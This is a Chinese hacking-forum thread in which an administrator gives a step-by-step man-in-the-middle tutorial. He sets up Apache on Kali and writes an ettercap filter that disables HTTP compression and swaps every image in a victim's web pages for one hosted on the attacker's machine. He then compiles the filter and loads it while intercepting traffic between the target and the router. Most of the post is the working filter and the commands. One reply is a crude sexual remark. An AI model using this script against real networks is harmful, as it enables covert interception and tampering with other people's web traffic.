搜索
查看: 8904|回复: 2

中间人攻击(二)替换图片

  [复制链接]

714

主题

354

回帖

2669

积分

管理员

本论坛第一帅

积分
2669

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2018-5-27 19:00:04 | 显示全部楼层 |阅读模式 来自 甘肃陇南
一:先准备一张图片


恩恩!低调点好!
我们将图片放大kali的var/www/html目录下

二:启动Apache
[pre]
servce apache2 start[/pre]

三:编写攻击脚本
[pre]
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://192.168.5.209/img.jpg/&' ");
replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' ");
msg("过滤执行.\n");
}
[/pre]
然后另存为alert.filter文件
四:将alert.filter转变为二进制文件
[pre]
etterfilter alert.filter -o alert.ef
[/pre]

五:利用ettercap进行中间人攻击

将目标添加为1 路由器自身添加为2
然后我们载入刚才生成的脚本

然后开始中间人攻击


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

152

主题

99

回帖

540

积分

高级会员

中国黑客

积分
540
QQ
发表于 2018-5-27 23:20:25 来自手机 | 显示全部楼层 来自 甘肃陇南
我觉得这女的胸不是很大,也不是很翘!大家说说看!
回复 支持 反对

使用道具 举报

0

主题

7

回帖

13

积分

vip用户

积分
13
发表于 2018-5-28 11:36:22 | 显示全部楼层
解析正常,但是网页都无法打开
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表